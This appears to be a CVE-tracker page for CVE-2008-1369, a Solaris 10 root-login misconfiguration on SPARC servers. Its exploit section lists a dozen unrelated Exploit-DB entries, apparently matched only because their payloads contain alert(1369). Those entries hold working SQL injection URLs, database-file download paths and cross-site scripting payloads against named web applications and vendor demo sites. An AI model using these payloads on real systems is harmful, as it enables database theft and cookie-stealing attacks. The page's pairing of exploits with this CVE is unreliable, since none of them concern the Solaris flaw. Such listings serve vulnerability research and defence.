CVE-2008-1369
published 2008-03-18CVE-2008-1369: A certain incorrect Sun Solaris 10 image on SPARC Enterprise T5120 and T5220 servers has /etc/default/login and /etc/ssh/sshd_config files that configure root…
PriorityP344critical10CVSS 2.0
AVNACLAuNCCICAC
EPSS
2.57%
83.4th percentile
A certain incorrect Sun Solaris 10 image on SPARC Enterprise T5120 and T5220 servers has /etc/default/login and /etc/ssh/sshd_config files that configure root logins in a manner unintended by the vendor, which allows remote attackers to gain privileges via unspecified vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | sunos | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
exploitdb·2009-01-16
CVE-2009-0337 blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
---
#########################################################
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Author : Pouya_Server , [email protected]
Vulnerability : (SQL/DD/XSS)
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
# milw0rm.com [2009-01-16]
Exploit-DB
RevSense 1.0 - SQL Injection / Cross-Site Scripting
exploitdb·2008-12-04
CVE-2008-6385 RevSense 1.0 - SQL Injection / Cross-Site Scripting
RevSense 1.0 - SQL Injection / Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32624/info
RevSense is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
RevSense 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/?f%5Bemail%[email protected]&f%5Bpassword%5D=\"§ion=user&action=login
http://www.example.com/?section=alert(1369)%3B&action=login&t=Pouya
http://www.example.com/index.php?section=alert(1369)&action=login
Exploit-DB
Yappa-ng - 'index.php?album' Cross-Site Scripting
exploitdb·2008-12-03
CVE-2008-6495 Yappa-ng - 'index.php?album' Cross-Site Scripting
Yappa-ng - 'index.php?album' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32623/info
The 'yappa-ng' program is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[Path]/index.php?album=%00'">alert(1369)%3B&adminlogin=Pouya_Server
Exploit-DB
Yappa-ng - Query String Cross-Site Scripting
exploitdb·2008-12-03
CVE-2008-6515 Yappa-ng - Query String Cross-Site Scripting
Yappa-ng - Query String Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32623/info
The 'yappa-ng' program is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[Path]/?>"'>alert(1369)
Exploit-DB
Z1Exchange 1.0 - 'id' Cross-Site Scripting
exploitdb·2008-12-02
CVE-2008-6386 Z1Exchange 1.0 - 'id' Cross-Site Scripting
Z1Exchange 1.0 - 'id' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32598/info
Z1Exchange is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Z1Exchange 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/[Path]/showads.php?id=alert(1369)
Exploit-DB
Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting
exploitdb·2008-12-02
CVE-2008-5980 Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting
Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting
---
#########################################################
Portal Name: Ocean12 Mailing List Manager Gold
Vendor : http://ocean12tech.com/products/o12mailgold
Author : Pouya_Server , [email protected]
Vulnerability : (DD,SQL,XSS)
#########################################################
[DD]:
http://site.com/[Path]/o12mail.mdb
[SQL]:
http://site.com/[Path]/s_edit.asp?email=[SQL]
http://site.com/[Path]/default.asp?Page=2&Email='[SQL]
[XSS]:
http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&[email protected]">alert(1369)%3B
Victem :
http://ocean12tech.com/products/o12mailgold/demo
# milw0rm.com [2008-12-02]
Exploit-DB
ASP Forum Script - 'default.asp' Query String Cross-Site Scripting
exploitdb·2008-12-01
CVE-2008-6891 ASP Forum Script - 'default.asp' Query String Cross-Site Scripting
ASP Forum Script - 'default.asp' Query String Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32571/info
ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/default.asp?>"'>alert(1369)
Exploit-DB
ASP Forum Script - 'messages.asp?forum_id' Cross-Site Scripting
exploitdb·2008-12-01
CVE-2008-6891 ASP Forum Script - 'messages.asp?forum_id' Cross-Site Scripting
ASP Forum Script - 'messages.asp?forum_id' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32571/info
ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/messages.asp?forum_id=>'>alert(1369)%3B&message_id=197
Exploit-DB
Softbiz Classifieds Script - 'showcategory.php?radio' Cross-Site Scripting
exploitdb·2008-12-01
CVE-2008-6325 Softbiz Classifieds Script - 'showcategory.php?radio' Cross-Site Scripting
Softbiz Classifieds Script - 'showcategory.php?radio' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32569/info
Softbiz Classifieds Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/showcategory.php?cid=9&type=1&keyword=Pouya&radio=>">alert(1369)%3B</ScRiPt
Exploit-DB
CodeToad ASP Shopping Cart Script - Cross-Site Scripting
exploitdb·2008-12-01
CVE-2008-6500 CodeToad ASP Shopping Cart Script - Cross-Site Scripting
CodeToad ASP Shopping Cart Script - Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32568/info
CodeToad ASP Shopping Cart Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/?>"'>alert(1369)
Exploit-DB
PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting
exploitdb·2008-12-01
CVE-2008-5976 PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting
PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32570/info
PHP JOBWEBSITE PRO is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/siteadmin/forgot.php
UserName:alert(1369)
Exploit-DB
Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting
exploitdb·2008-12-01
CVE-2008-6888 Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting
Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32567/info
Pre Classified Listings is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
All versions are considered vulnerable.
http://www.example.com/[Path]/home/[email protected]&[email protected]&[email protected]&address= alert(1369)%3B&[email protected]&state=0&hide_email=on&url_add=111-222
Exploit-DB
Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
exploitdb·2008-11-27
CVE-2008-6370 Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure
---
#########################################################
Portal Name: Ocean12 Contact Manager Pro
Version : 1.02
Vendor : http://ocean12tech.com/products/contact
Dork: Maintained with the Ocean12 Contact Manager Pro v1.02
Author : Pouya_Server , [email protected]
Vulnerability : (DDV,XSS,SQL)
#########################################################
[SQL]:
http://site.com/path/default.asp?DisplayFormat=Card&Sort=[SQL]
[Database Disclosure Vulnerability]:
http://site.com/path/o12con.mdb
[XSS]:
http://site.com/path/?DisplayFormat=>">alert(1369)%3B&Action=Pouya_Server
Victem :
http://ocean12tech.com/products/contact/demo
# milw0rm.com [2008-11-27]
No writeups or analysis indexed.
http://secunia.com/advisories/29529http://sunsolve.sun.com/search/document.do?assetkey=1-66-231244-1http://www.securityfocus.com/bid/28469http://www.securitytracker.com/id?1019708http://www.vupen.com/english/advisories/2008/0810/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41332http://secunia.com/advisories/29529http://sunsolve.sun.com/search/document.do?assetkey=1-66-231244-1http://www.securityfocus.com/bid/28469http://www.securitytracker.com/id?1019708http://www.vupen.com/english/advisories/2008/0810/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41332
2008-03-18
Published